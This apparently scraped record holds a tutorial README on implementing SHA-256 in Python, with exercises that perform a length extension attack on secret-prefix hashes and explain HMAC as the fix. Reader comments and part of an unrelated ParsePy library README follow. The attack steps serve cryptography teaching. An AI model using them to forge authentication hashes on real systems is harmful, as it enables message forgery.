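\n\nBefore we dig into the details of padding, here's a quick look back at Problem 11: one possible Python version of the compression loop (a sketch, assuming the `message_schedule()`, `round()`, and `add32()` functions from Problems 5, 10, and 1):\n\n```python\ndef compress(input_state, block):\n    W = message_schedule(block)\n    state = input_state\n    for i in range(64):\n        state = round(state, ROUND_CONSTANTS[i], W[i])\n    # mix the original input state back into the result at the end\n    return [add32(input_state[i], state[i]) for i in range(8)]\n```\n\nNow, back to the padding scheme and its definition in terms of bits.\n\n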
I\nthink it's a little clearer in those terms, so let's start there. Remember that\nthere are 8 bits in a byte, so a block size of 64 bytes is the same as 512\nbits. Here's the padding scheme as it's originally defined:\n\n1. Start the padding bitstring with a single 1-bit.\n2. Then append some 0-bits after that. We'll define how many in step 4 below.\n3. Finally, append the bit-length of the message, encoded as a 64-bit unsigned\n big-endian number with\n [`.to_bytes(8, \"big\")`](https://docs.python.org/3/library/stdtypes.html#int.to_bytes).\n4. Choose the number of 0-bits for step 2 to be the smallest number such that\n the total bit-length of the message plus the padding is an exact multiple of\n 512.\n\nA side note: You might notice that step 3 there isn't actually necessary for\nmaking the padding unambiguous. Steps 1 and 2 are sufficient for that. The goal\nof step 3 is to make it harder to find collisions, by including the message\nlength in the mix.\n\nDefining the padding scheme in terms of bits like this is pretty\nstraightforward, but in practice our programming languages and our computer\nhardware don't usually talk about individual bits directly. We need to\ntranslate that definition into bytes. So here's the exact same padding scheme,\nredescribed in terms of bytes, the way we'll actually implement it:\n\n1. Start the padding bytestring with a single 0x80 byte (decimal 128, binary\n 0b10000000). As you can see in the binary representation, this is a single\n 1-bit followed by seven 0-bits.\n2. Then append some 0x00 bytes after that. We'll define how many in step 4\n below.\n3. Finally, append **8 times** the byte-length of the message, encoded as an\n 8-byte unsigned big-endian number with\n [`.to_bytes(8, \"big\")`](https://docs.python.org/3/library/stdtypes.html#int.to_bytes).\n (Forgetting to multiply the `len()` by 8 here is a *common mistake*.)\n4. Choose the number of 0x00 bytes for step 2 to be the smallest number such\n that the total byte-length of the message plus the padding is an exact\n multiple of 64.\n\nThat translation made things a little less elegant. The first byte is less\nobvious, and the multiply-by-8 step is easy to forget. But we'll manage.\n\nHow do we determine the number of 0x00 bytes in step 4? If you like little\narithmetic puzzles, this is another good one to think about on your own before\nreading further. Otherwise, feel free to copy the following three lines of\nPython:\n\n```python\nremainder_bytes = (message_length + 8) % 64 # number of bytes in the final block, including the appended length\nfiller_bytes = 64 - remainder_bytes # number of bytes we need to add, including the initial 0x80 byte\nzero_bytes = filler_bytes - 1 # number of 0x00 bytes we need to add\n```\n\nTake a minute or two to review that logic and convince yourself it's correct.\nThen write a function like `padding(message_length)`, which takes the original\n**byte-length** of a message and returns the padding **bytestring** for that\nmessage. Your input for this problem is a list of message byte-lengths. For\neach of these, call your `padding()` function with that length as an argument\nand hex-encode the resulting padding bytes. (There are no message bytes to\nconcatenate in this problem, just the padding bytes themselves.) Your output\nfor this problem should be the resulting list of hex-encoded padding strings.\n\nI recommend that you have your `padding()` function return raw bytes, and that\nyou call it like `padding(...).hex()` for this problem. 
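\n\nA minimal sketch of that raw-bytes approach, using the three lines above, might look like this:\n\n```python\ndef padding(message_length):\n    remainder_bytes = (message_length + 8) % 64\n    filler_bytes = 64 - remainder_bytes\n    zero_bytes = filler_bytes - 1\n    # 0x80, then the 0x00 filler, then 8 * the byte-length as an 8-byte big-endian number\n    return b\"\\x80\" + b\"\\x00\" * zero_bytes + (8 * message_length).to_bytes(8, \"big\")\n\nassert padding(55).hex() == \"8000000000000001b8\"\n```\n\n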
If you prefer to have\nyour `padding()` function do hex-encoding internally, that's ok too, but then\nyou'll need to remember to hex-decode its output in the following problems.\n\n**Input:** a list of message lengths, counted in bytes\n\n**Output:** a list of SHA-256 padding bytestrings, each hex-encoded\n\nThis padding function was our last big moving part. All we have to do now is\nput the padding function and the compression function together.\n\n## The Hash Function\n\n### Problem 13: the hash function\n\nNow we're ready to assemble the complete hash function. The genuine article.\nOnce you finish this problem, you can test your code against Python's `hashlib`\nor against any other SHA-256 implementation in the world, and your output will\nbe exactly the same. Knock on wood.\n\nAs we did with block ciphers, we're going to pad the message and split it up\ninto blocks. Let's look at that Merkle\u2013Damg\u00e5rd diagram again:\n\n\"Merkle\u2013Damg\u00e5rd\n\nM1, M2, and so on represent 64-byte blocks of the padded\nmessage. There are as many M blocks as needed, depending on the padded message\nlength. The output state (\"chaining value\") returned by each call to the\ncompression function (H1, H2, and so on) becomes the\ninput state for the following call. And the final chaining value returned by\nthe last call to the compression function is the SHA-256 hash of the message.\n\nYou might've noticed one last missing detail: Where do we get H0,\nthe input state for the first call to the compression function? We'll use a\nconstant for this. As in CBC mode, we'll call this constant the \"initialization\nvector\", or IV for short. Unlike CBC mode, where the IV needs to be uniformly\nrandom every time, the SHA-256 IV never changes. It's baked into the standard.\nThis is the other set of constants at the top of the [Wikipedia\npseudocode](https://en.wikipedia.org/wiki/SHA-2#Pseudocode). Paste the\nfollowing into your Python code as another global variable:\n\n```python\nIV = [\n 0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a,\n 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19,\n]\n```\n\nNow, write a function like\n[`sha256(message)`](https://youtu.be/6v5VahaEL7s?t=438). Inside it, use your\n`padding()` function to generate padding bytes, and then append them to the\nmessage bytes. Note that nothing should be hex-encoded at this point. (Using\nhex-encoded padding here is a _common mistake_.) Create a `state` variable,\nwhose starting value is `IV`. Then split the padded message up into 64-byte\nblocks and loop over the blocks, calling your `compress()` function on each\none. For each call to `compress()`, use the current `state` value as input and\nassign the return value back to `state`. Double check that your argument types\nfor `compress()` are the same as they were in Problem 11. (Calling\n`compress()` with block bytes here but block words there is another _common\nmistake_.) Once the block loop is finished, convert the final value of `state`\ninto 32 bytes by encoding each of the 8 state words as a 4-byte **big endian**\ninteger and concatenating them. Those 32 bytes are the return value of\n`sha256()`.\n\n> Debugging tips: Even if you've passed tests for all the previous problems,\n> and your `sha256()` function looks good, sometimes you can still get the\n> wrong answer here. Look carefully for the common mistakes described above.\n> Also look for accidental global variables in your functions, which might\n> refer to input from a previous problem. 
If you get stuck, put print\n> statements everywhere, and compare what you see to these [known-good debug\n> printouts for\n> `sha256(b\"\")`](https://gist.github.com/oconnor663/27804bb33542bbf398aab16e102d8594).\n\nYour input for this problem is a list of ASCII strings. Convert each string to\nbytes and hash it with your `sha256()` function. Your output should be a list\nof the resulting SHA-256 hashes, each encoded as hex.\n\n**Input:** a list of ASCII strings\n\n**Output:** a list of the hex-encoded SHA-256 hashes of those strings\n\n\n \"I\n\n\n## The Length Extension Attack\n\nIf we were to stop here, all our blood, sweat, and tears would not have been\nwasted. Implementing SHA-256 is an accomplishment in itself, and the intuition\nyou've gained along the way will hopefully be useful to you whenever you see a\nhash function from now on. But besides that broad intuition, you've also\nlearned some very specific tricks: Now you know how to invoke the SHA-256\ncompression and padding functions directly, which isn't something that most\nlibrary implementations will let you do. It turns out that you can use these\ntricks to pull off an important attack, and the best time to learn this attack\nis while the tricks are still fresh in your mind. Strike while the iron is hot,\nas they say.\n\nSHA-256 has a flaw. Although its collision resistance and other security\nproperties remain unbroken so far, it does *not* behave like a true [\"random\noracle\"](https://en.wikipedia.org/wiki/Random_oracle). Some SHA-256 outputs are\n_related_ to each other, in a way that you can detect or exploit even when you\ndon't know the input. This exploit is called a \"length extension attack\".\n\nRemember how the \"chaining values\" worked in Problem 13. The output from\neach call to the compression function became the input for the next call. But\nthe final output, well, it just became the hash. We didn't do anything special\nto it; we just returned it. That means that if you look at a SHA-256 hash,\nyou're looking at the same state that _would have been used_ to call the\ncompression function again _if there had been more input._\n\nThis was a design mistake. (The designers actually knew about this issue at the\ntime but didn't consider it important.) Here's the problem: Suppose you're an\nattacker, and you're looking at a hash that I've published. Let's say you don't\nknow what input I used, maybe because I included a secret key or something like\nthat. Because of this mistake, even though you don't know my input, you can\nconstruct a _new_ hash, which matches a _different_ input, one which starts\nwith the _same bytes as mine_ but then has some extra bytes of your choosing\nadded to the end. If SHA-256 hashes were truly independent of each other, this\nwouldn't be possible, but they aren't, and it is possible.\n\nThere's one thing standing between you and this attack: the padding. I didn't\ndo anything special to the last chaining value, but I did pad my input. Those\npadding bytes went into the state that you're looking at, and there's no way\nfor you to unmix them. But you can live with that, by making a clever\ncompromise:\n\n*Pretend that my padding bytes are part of your chosen suffix.*\n\nThat is to say, you can't extend my input with a totally arbitrary suffix, but\nyou can choose any suffix that starts with my padding bytes. 
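\n\nSince the attack is going to reuse the machinery from Problem 13 directly, it may help to have the finished hash function in front of us. Here's one way `sha256()` might look (a sketch, assuming the `padding()` and `compress()` functions and the `IV` constant from earlier):\n\n```python\ndef sha256(message):\n    padded = message + padding(len(message))\n    state = IV\n    for block_start in range(0, len(padded), 64):\n        state = compress(state, padded[block_start : block_start + 64])\n    # serialize the final 8 state words as 32 big-endian bytes\n    return b\"\".join(word.to_bytes(4, \"big\") for word in state)\n\nassert sha256(b\"\").hex() == \"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"\n```\n\nBack to the attack: the suffix you extend with has to begin with my padding bytes.\n\n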
That's an\nimportant limitation, but it still allows for quite a lot of mischief.\n\nIf you're reading through this project before we've covered Chapter 7 of\n*Serious Cryptography*, it might not yet be clear why this attack is important.\nThe short answer is, this attack is why we need an algorithm called\n[HMAC](https://en.wikipedia.org/wiki/HMAC) for keyed hashing, and programmers\nwho don't know about HMAC often misuse hash functions in ways that are\nvulnerable to this attack. We'll get to HMAC in class shortly, if we haven't\nalready. For now, let's see the length extension attack in action.\n\n### Problem 14: modeling the extended input\n\nLet's say my original input is 55 bytes long. I've chosen that length because\nit's the most that still fits in one 64-byte block after padding is added.\nWhat's the padding in this case? Let's use our `padding()` function to see it:\n\n```\n>>> padding(55)\nb'\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xb8'\n>>> padding(55).hex()\n'8000000000000001b8'\n```\n\nWe can recognize the pieces there. One 0x80 byte at the front, no extra 0x00\nbytes in this case, and an 8-byte big-endian integer encoding the value\n0x01b8 = 440 = 8 * 55, which is my input length\nin bits. My original 55 bytes and these 9 bytes of padding are 64 bytes put\ntogether, exactly one block. Clear so far?\n\nNow put your attacker hat back on. You're going to pretend that those padding\nbytes are actually the start of your chosen suffix. Then you're going to add\nany number of additional suffix bytes of your choosing. The resulting\n\"synthetic\" input, which you're ultimately going to compute the hash of, will\nbe equivalent to my original, plus my padding, plus the rest of your chosen\nsuffix. Let's say my original input was fifty-five `0xaa` bytes, and you chose\nthree `0xff` bytes for your suffix. In that case the synthetic message,\nrepresented here as a hex-encoded string that I've split over a few lines,\nwould be:\n\n```\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa <-- the first 32-byte half of the first block\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa8000000000000001b8 <-- the second 32-byte half of the first block\nffffff <-- the second block, 3 bytes *before* padding\n```\n\nTo be clear, we won't construct this complete synthetic string ourselves when\nwe perform the length extension attack. In fact, we can't. All those `0xaa`\nbytes in my original input are hidden from the attacker. But this synthetic\nstring is what our final length-extended hash will *represent*, and we want to\nmodel it in this problem.\n\nYour input for this problem is an object with two fields, `\"original_input\"`\ncontaining an ASCII string that we want to extend, and `\"chosen_suffix\"`\ncontaining the ASCII string that we want to extend it with. Convert these\nstrings to bytes, and construct the synthetic message with padding in the\nmiddle that a length extension attack would compute the hash of. Your output\nshould be this synthetic string, encoded as hex.\n\n**Input:** an object with two fields, `\"original_input\"` and `\"chosen_suffix\"`\n\n**Output:** the synthetic message, encoded as hex\n\n### Problem 15: recovering the state\n\nThe length extension attack will reuse a hash as a chaining value, feeding it\ninto additional calls to the compression function. However, you might remember\nthat there was a conversion step we did when we returned the hash. We converted\nit from 8 words to 32 bytes. 
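\n\nThat conversion and its inverse might look something like this (a sketch):\n\n```python\ndef state_to_bytes(state):\n    return b\"\".join(word.to_bytes(4, \"big\") for word in state)\n\ndef bytes_to_state(state_bytes):\n    assert len(state_bytes) == 32\n    return [int.from_bytes(state_bytes[4 * i : 4 * i + 4], \"big\") for i in range(8)]\n\n# a round trip through both directions gets us back where we started\nassert bytes_to_state(state_to_bytes(list(range(8)))) == list(range(8))\n```\n\n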
We need to undo that and recover the words.\n\nYour input for this problem is a 32-byte hash, encoded as hex. Hex-decode it\ninto bytes. Then convert it back into a list of 8 words, by breaking it into\ngroups of 4 bytes and parsing each 4-byte group as a **big-endian** integer.\nYour output should be that list.\n\n**Input:** a 32-byte hash, encoded as hex\n\n**Output:** the list of 8 state words recovered from the hash\n\n### Problem 16: the length extension attack\n\nWe're ready to perform the attack. Your input for this problem will be an\nobject with three fields, `\"original_hash\"`, `\"original_len\"`, and\n`\"chosen_suffix\"`. Hex-decode the original hash and convert the chosen suffix\nto ASCII bytes. Recover the list of 8 state words from the original hash, as\nyou did in Problem 15 above.\n\nNow, to begin the attack, _re-pad_ the chosen suffix, like you padded the\nregular message in Problem 13. However, instead of calling your\n`padding()` function with the length of the suffix itself, call it with the\n*total length of the synthetic message*. That is, the original input length,\nplus the length of the original input's padding, plus the length of the suffix.\n(This makes your padding bytes different, but it doesn't change _how many_\npadding bytes you get. Can you see why?)\n\nNext, hash the padded suffix by looping over its blocks and calling\n`compress()` on each of them, again as you did in Problem 13. However,\ninstead of using `IV` for your initial state, use the state words that you\nrecovered from the original hash.\n\nOnce you've compressed all the resulting blocks, the attack is finished.\nConvert your list of 8 state words back into 32 bytes, using the same method as\nin Problem 13. Your output for this problem should be the resulting hash,\nencoded as hex.\n\nThe input for the `\"original_hash\"` given in `example_input.json` was `elephant\njaguar vulture octopus butterfly`. You don't need to know that to extend it,\nbut if you like, you can check that the output is indeed a valid extension of\nthat original string as an exercise.\n\n**Input:** an object with three fields, `\"original_hash\"`, `\"original_len\"`, and `\"chosen_suffix\"`\n\n**Output:** the length-extended hash, encoded as hex\n\n\n \"he\n\n\n## Conclusion\n\nThe project is finished, and there are no more questions. If you've made it\nthis far, then you know more about the insides of a hash function than many\ncryptographers do. That's something to be proud of, and I hope you'll find that\nit was worth the trouble.\n\nIf you're tired of hashing and ready for a break, no need to read any further.\nBut if you found all this very interesting and you're eager to learn more,\nthere are many different avenues to explore. Here are a few:\n\n- In Problem 13, we implemented \"all-at-once\" hashing. That is, the entire\n input string was provided as an argument. In practice however, most hash\n functions are designed to work incrementally, piece-by-piece. When the input\n is very large, they read smaller chunks of it in a loop, so that the\n application doesn't need to allocate lots of memory for a large string.\n Python's `hashlib` module provides the\n [`.update()`](https://docs.python.org/3/library/hashlib.html#hashlib.hash.update)\n method for this. You can try refactoring your own SHA-256 code to support\n some sort of \"update\" function, which can be called multiple times. 
You'll\n need to think about how to \"buffer\" input when what you're given isn't an\n exact multiple of 64 bytes.\n\n- More recent designs like SHA-3, BLAKE2, and BLAKE3 prevent length extension\n attacks by making sure that their chaining values and their published hashes\n are different from each other in some way. This prevents an attacker from\n looking at a hash and recovering the chaining value that would have been used\n to compress more input, like we did in Problems 15 and 16. Think about ways\n you might modify SHA-256 to prevent this. What if the compression function\n was implemented in hardware, and you weren't allowed to change it?\n\n- The Merkle\u2013Damg\u00e5rd contruction is very common, but there are other ways to\n organize things. SHA-3 uses a \"sponge construction\" (p. 115), and BLAKE3 uses\n a \"Merkle tree\" (named after the same Ralph Merkle). These different\n structures can have a variety of different benefits. You might compare and\n contrast your SHA-256 code with [this Python implementation of\n SHA-3](https://github.com/coruus/py-keccak/blob/master/fips202/keccak.py),\n especially the part where they use `permute()` instead of `compress()`.\n\n- Some use cases, particularly hash tables (dictionaries in Python), can\n tolerate collisions. For these cases, it's common to use a faster hash\n function with a smaller state and a shorter output. See for example\n [SipHash](https://en.wikipedia.org/wiki/SipHash), also designed by J.P.\n Aumasson, the author of [our textbook](https://nostarch.com/seriouscrypto).\n SipHash is used by default in the Rust\n [`HashMap`](https://doc.rust-lang.org/std/collections/struct.HashMap.html),\n for example. But note that even though hash tables/maps don't need collision\n resistance per se, they often do need some related security properties,\n because they can be [vulnerable to DOS\n attacks](https://www.anchor.com.au/blog/2012/12/how-to-explain-hash-dos-to-your-parents-by-using-cats/)\n if an attacker is able to produce too many collisions.\n\n- Some applications need a hash function with more exotic properties. For\n example, you might be familiar with the `rsync` command for copying files\n over a network. Rsync uses a [\"rolling\n hash\"](https://en.wikipedia.org/wiki/Rolling_hash) to efficiently detect\n blocks that are the same between two different versions of a file. Rolling\n hashes look quite different from cryptographic hash functions, and they\n usually don't make strong security guarantees. If you have access to a remote\n server, you can play with making a tiny change to a large file, and see how\n long it takes Rsync to pick up the change.\n\nHappy hashing.\n", "readme_type": "markdown", "hn_comments": "I really like this. Cryptography is obviously very hard to get right and complex, and for that reason people have said \"don't roll your own crypto\" - but really, that's stupid. What we need is accessible information to explain cryptography to people, so they know how to make smart crypto decisions, know what pitfalls exist, etc.I think crypto has done a particularly bad job of providing accessible materials, historically, and has had a terrible attitude towards doing so. Things are changing, and that's nice.Wrote a similar article, in Barbarian language for the German audience here, and completely in Python.I found it really difficult to find written and understandable material for this topic. Mostly people posts Youtube clickbait videos about that.Though, this one goes far beyond the simple process. 
So I almost don't dare to compare my profane post to this elaborarte description.\"Wie funktioniert der SHA256 Algorithmus\u2026im Detail? (Teil 1/2) \u2013 nicky reinert\" https://nickyreinert.de/blog/2021/10/31/wie-funktioniert-der...I found this video to be an excellent explanation and sufficient to implement the algorithm: https://www.youtube.com/watch?v=f9EbD6iY9zICode: https://gist.github.com/void4/6f5ff23a3df81d6115fceb6adefddd...This site contains a nice visualization: https://sha256algorithm.com/I wonder how the newer hashes, like Reinforced Concrete, that are used in Zero-Knowledge applications compare to SHA-256.I mean can Reinforced Concrete replace SHA-256, as the primary hash, in a blockchain?Proof-of-work cryptocurrencies moved toward complex hash functions that are \"ASIC resistant\" in order to attempt to keep mining power as distributed as possible (for CPUs), because whatever highly-funded manufacturer designs the most-optimized and fastest ASICs gains concentrated mining power. ASIC hash/W efficiency doubles every couple of years, so using them as heaters becomes cost-ineffective as difficulty adjusts.But what if we turned this all on its head and intentionally designed a hash function that is \"ASIC optimized\" so that the perfect ASIC miner design could be found quickly (perhaps at its very conception), and miners became a generic commodity item, \"grey goo miners\", and used them as space heaters in cold climates, or maybe even wherever electric heating was needed in industry? That way mining would be as distributed as the need for electric heating, and its energy would be put to good use. It might also put a ceiling on the total electricity consumed because it would be hard to compete with any miner whose electric bills are \"free\" (relatively).The most interesting part of this is the section on Length Extension Attack. Implementing SHA256 isn't all that interesting since it's just a mechanistic translation of an algorithm, but the attack shows off one of the implications of how the function works.I was hoping this would explain a bit more about why the algorithm does the things it does. Do we have proofs for why certain types of mixing are more secure than others?Also, it's funny how even world-class cryptographers can think it's perfectly fine to directly output internal state as the digest. Some things are only obvious in retrospect.OP appears to be Jack O'Connor, one of the designers of BLAKE3, which is the fastest full-strength cryptographic hash function currently available. It's always nice to see practicing cryptographers also producing digestible cryptography content.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "milesrichardson/ParsePy", "link": "https://github.com/milesrichardson/ParsePy", "tags": ["parse-server", "python", "parse"], "stars": 516, "description": "A relatively up-to-date fork of ParsePy, the Python wrapper for the Parse.com API. Originally maintained by @dgrtwo ", "lang": "Python", "repo_lang": "", "readme": "Note: As of May 13, 2016, this repository (`milesrichardson/ParsePy)` is the\nmost up-to-date and active python client for the Parse API. It supports self-hosted\n`parse-server` via the REST API. Note that some features will not work with parse-server,\nif they are not supported by the REST API (e.g. 
push).\n\nSee the section below, \"using with self-hosted parse-server,\" for instructions.\n\nparse_rest\n==========\n\n**parse_rest** is a Python client for the [Parse REST\n API](http://docs.parseplatform.org/rest/guide). It provides:\n\n - Python object mapping for Parse objects with methods to save,\n update, and delete objects, as well as an interface for querying\n stored objects.\n - Complex data types provided by Parse with no python equivalent\n - User authentication, account creation** (signup) and querying.\n - Cloud code integration\n - Installation querying\n - push\n - Roles/ACLs**\n - Image/File type support (done 1/14/17)\n\n\n** for applications with access to the MASTER KEY, see details below.\n\n\nInstallation\n------------\n\nThe easiest way to install this package is by downloading or\ncloning this repository:\n\n pip install git+https://github.com/milesrichardson/ParsePy.git\n\nNote: The version on [PyPI](http://pypi.python.org/pypi) is not\nup-to-date. The code is still under lots of changes and the stability\nof the library API - though improving - is not guaranteed. Please\nfile any issues that you may find if documentation/application.\n\n\nUsing with self-hosted `parse-server`\n-------------\n\nTo use the library with self-hosted parse-server, set the environment variable\n`PARSE_API_ROOT` before importing the module.\n\nExample:\n\n~~~~~ {python}\nimport os\nos.environ[\"PARSE_API_ROOT\"] = \"http://your_server.com:1337/parse\"\n\n# Everything else same as usual\n\nfrom parse_rest.datatypes import Function, Object, GeoPoint\nfrom parse_rest.connection import register\nfrom parse_rest.query import QueryResourceDoesNotExist\nfrom parse_rest.connection import ParseBatcher\nfrom parse_rest.core import ResourceRequestBadRequest, ParseError\n\nAPPLICATION_ID = '...'\nREST_API_KEY = '...'\nMASTER_KEY = '...'\n\nregister(APPLICATION_ID, REST_API_KEY, master_key=MASTER_KEY)\n~~~~~\n\n\nTesting\n-------\n\nTo run the tests, you need to:\n\n* create a `settings_local.py` file in your local directory with three\n variables that define a sample Parse application to use for testing:\n\n~~~~~ {python}\nAPPLICATION_ID = \"APPLICATION_ID_HERE\"\nREST_API_KEY = \"REST_API_KEY_HERE\"\nMASTER_KEY = \"MASTER_KEY_HERE\"\n~~~~~\n\nNote Do **not** give the keys of an existing application with data you want to\nkeep: create a new one instead. The test suite will erase any existing CloudCode\nin the app and may accidentally replace or change existing objects.\n\n* install the [Parse CloudCode tool](http://docs.parseplatform.org/cloudcode/guide/)\n\nYou can then test the installation by running the following command:\n\n # test all\n python -m unittest parse_rest.tests\n\n # or test individually\n python -m unittest parse_rest.tests.TestObject.testCanCreateNewObject\n\nUsage\n-----------\n\nBefore the first interaction with the Parse server, you need to\nregister your access credentials. You can do so by calling\n`parse_rest.connection.register`.\n\nBefore getting to code, a word of caution. You need to consider how your application is\nmeant to be deployed. Parse identifies your application through\ndifferent keys (available from your Parse dashboard) that are used in\nevery request done to their servers.\n\nIf your application is supposed to be distributed to third parties\n(such as a desktop program to be installed), you SHOULD NOT put the\nmaster key in your code. 
If your application is meant to be running in\nsystems that you fully control (e.g, a web app that needs to integrate\nwith Parse to provide functionality to your client), you may also add\nyour *master key*.\n\n~~~~~ {python}\nfrom parse_rest.connection import register\nregister(, [, master_key=None])\n~~~~~\n\nOnce your application calls `register`, you will be able to read, write\nand query for data at Parse.\n\n\nData types\n----------\n\nParse allows us to get data in different base types that have a direct\npython equivalent (strings, integers, floats, dicts, lists) as well as\nsome more complex ones (e.g.:`File`, `Image`, `Date`). It also allows\nus to define objects with schema-free structure, and save them, as\nwell to query them later by their attributes. `parse_rest` is\nhandy as a way to serialize/deserialize these objects transparently.\n\nThe Object type\n---------------\n\n\nIn theory, you are able to simply instantiate a `Object` and do\neverything that you want with it, save it on Parse, retrieve it later,\netc.\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object\n\nfirst_object = Object()\n~~~~~\n\nIn practice, you will probably want different classes for your\napplication to allow for a better organization in your own code.\nSo, let's say you want to make an online game, and you want to save\nthe scoreboard on Parse. For that, you decide to define a class called\n`GameScore`. All you need to do to create such a class is to define a\nPython class that inherts from `parse_rest.datatypes.Object`:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object\n\nclass GameScore(Object):\n pass\n~~~~~\n\nYou can also create an Object subclass by string name, with the `Object.factory`\nmethod:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object\n\nmyClassName = \"GameScore\"\nmyClass = Object.factory(myClassName)\n\nprint myClass\n# \nprint myClass.__name__\n# GameScore\n~~~~~\n\nYou can then instantiate your new class with some parameters:\n\n~~~~~ {python}\ngameScore = GameScore(score=1337, player_name='John Doe', cheat_mode=False)\n~~~~~\n\nYou can change or set new parameters afterwards:\n\n~~~~ {python}\ngameScore.cheat_mode = True\ngameScore.level = 20\n~~~~\n\nTo save our new object, just call the save() method:\n\n~~~~~ {python}\ngameScore.save()\n~~~~~\n\nIf we want to make an update, just call save() again after modifying\nan attribute to send the changes to the server:\n\n~~~~~ {python}\ngameScore.score = 2061\ngameScore.save()\n~~~~~\n\nYou can also increment the score in a single API query:\n\n~~~~~ {python}\ngameScore.increment(\"score\")\n~~~~~\n\nNow that we've done all that work creating our first Parse object, let's delete it:\n\n~~~~~ {python}\ngameScore.delete()\n~~~~~\n\nThat's it! You're ready to start saving data on Parse.\n\nObject Metadata\n---------------\n\nThe attributes objectId, createdAt, and updatedAt show metadata about\na _Object_ that cannot be modified through the API:\n\n~~~~~ {python}\ngameScore.objectId\n# 'xxwXx9eOec'\ngameScore.createdAt\n# datetime.datetime(2011, 9, 16, 21, 51, 36, 784000)\ngameScore.updatedAt\n# datetime.datetime(2011, 9, 118, 14, 18, 23, 152000)\n~~~~~\n\nAdditional Datatypes\n--------------------\n\nWe've mentioned that Parse supports more complex types, most of these\ntypes are also supported on Python (dates, files). So these types can\nbe converted transparently when you use them. 
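For example, a plain Python `datetime` can be assigned to an attribute and saved like any other value (a small sketch; it assumes `register` has been called and reuses the `gameScore` object from above, and `played_at` is just an illustrative attribute name):

~~~~~ {python}
import datetime

gameScore.played_at = datetime.datetime.now()  # stored as a Parse Date
gameScore.save()

# Dates come back as Python datetime objects, just like createdAt in the
# metadata example above.
print gameScore.played_at
~~~~~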
For the types that Parse\nprovided and Python does not support natively, `parse_rest` provides\nthe appropiates classes to work with them. One such example is\n`GeoPoint`, where you store latitude and longitude\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object, GeoPoint\n\nclass Restaurant(Object):\n pass\n\nrestaurant = Restaurant(name=\"Los Pollos Hermanos\")\n# coordinates as floats.\nrestaurant.location = GeoPoint(latitude=12.0, longitude=-34.45)\nrestaurant.save()\n~~~~~\n\nWe can store a reference to another Object by assigning it to an attribute:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object\n\nclass CollectedItem(Object):\n pass\n\ncollectedItem = CollectedItem(type=\"Sword\", isAwesome=True)\ncollectedItem.save() # we have to save it before it can be referenced\n\ngameScore.item = collectedItem\n~~~~~\n\n\nFile Support\n---------------\n\nYou can upload files to parse (assuming your `parse-server` instance supports it).\nThis has been tested with the default GridStore adapter.\n\nExample:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object, File\n\nclass GameScore(Object):\n pass\n\n# 1. Upload file\n\nwith open('/path/to/screenshot.png', 'rb') as fh:\n rawdata = fh.read()\n\nscreenshotFile = File('arbitraryNameOfFile', rawdata, 'image/png')\nscreenshotFile.save()\n\nprint screenshotFile.url\n\n# 2. Attach file to gamescore object and save\ngs = GameScore.Query.get(objectId='xxxxxxx')\ngs.screenshot = screenshotFile\ngs.save()\n\nprint gs.file.url\n~~~~~\n\n\nBatch Operations\n----------------\n\nFor the sake of efficiency, Parse also supports creating, updating or deleting objects in batches using a single query, which saves on network round trips. You can perform such batch operations using the `connection.ParseBatcher` object:\n\n~~~~~ {python}\nfrom parse_rest.connection import ParseBatcher\n\nscore1 = GameScore(score=1337, player_name='John Doe', cheat_mode=False)\nscore2 = GameScore(score=1400, player_name='Jane Doe', cheat_mode=False)\nscore3 = GameScore(score=2000, player_name='Jack Doe', cheat_mode=True)\nscores = [score1, score2, score3]\n\nbatcher = ParseBatcher()\nbatcher.batch_save(scores)\nbatcher.batch_delete(scores)\n~~~~~\n\nYou can also mix `save` and `delete` operations in the same query as follows (note the absence of parentheses after each `save` or `delete`):\n\n~~~~~ {python}\nbatcher.batch([score1.save, score2.save, score3.delete])\n~~~~~\n\nIf an error occurs during one or multiple of the operations, it will not affect\nthe execution of the remaining operations. Instead, the `batcher.batch_save` or\n`batcher.batch_delete` or `batcher.batch` will raise a `ParseBatchError`\n(child of `ParseError`) exception with `.message` set to a *list* of the errors\nencountered. 
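A caller can therefore catch the exception and inspect each failed operation individually (a minimal sketch; it assumes `ParseBatchError` is importable from `parse_rest.core`, as the traceback further below suggests, and reuses the `score1`..`score3` objects defined earlier):

~~~~~ {python}
from parse_rest.connection import ParseBatcher
from parse_rest.core import ParseBatchError

batcher = ParseBatcher()
try:
    batcher.batch_save([score1, score2, score3])
except ParseBatchError as e:
    # .message is a list with one entry per operation that failed
    for err in e.message:
        print err
~~~~~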
For example:\n\n~~~~~ {python}\n# Batch save a list of two objects:\n# dupe_object is a duplicate violating a unique key constraint\n# dupe_object2 is a duplicate violating a unique key constraint\n# new_object is a new object satisfying the unique key constraint\n#\n# dupe_object and dupe_object2 will fail to save, and new_object will save successfully\n\ndupe_object = list(MyClass.Query.all().limit(2))[0]\ndupe_object2 = list(MyClass.Query.all().limit(2))[1]\nnew_object = MyClass(some_column=11111)\nobjects = [dupe_object, dupe_object2, new_object]\n\nbatcher = ParseBatcher()\nbatcher.batch_save(objects)\n~~~~~\n\nwill raise an exception:\n\n~~~~~ {python}\nTraceback (most recent call last):\n File \"\", line 1, in \n File \"/Users/miles/ParsePy/parse_rest/connection.py\", line 199, in batch_save\n self.batch(o.save for o in objects)\n File \"/Users/miles/ParsePy/parse_rest/connection.py\", line 195, in batch\n raise core.ParseBatchError(batched_errors)\n\nParseBatchError: [{u'code': 11000, u'error': u'E11000 duplicate key error index: myapp.MyClass.$my_column_1 dup key: { : 555555 }'}, {u'code': 11000, u'error': u'E11000 duplicate key error index: myapp.MyClass.$my_column_1 dup key: { : 44444 }'}]\n~~~~~\n\nAnd `CRUCIALLY`, the objectId field of the NON-duplicate object will be correctly set:\n\n~~~~~ {python}\n>>> #batch_save as above...\n>>> print 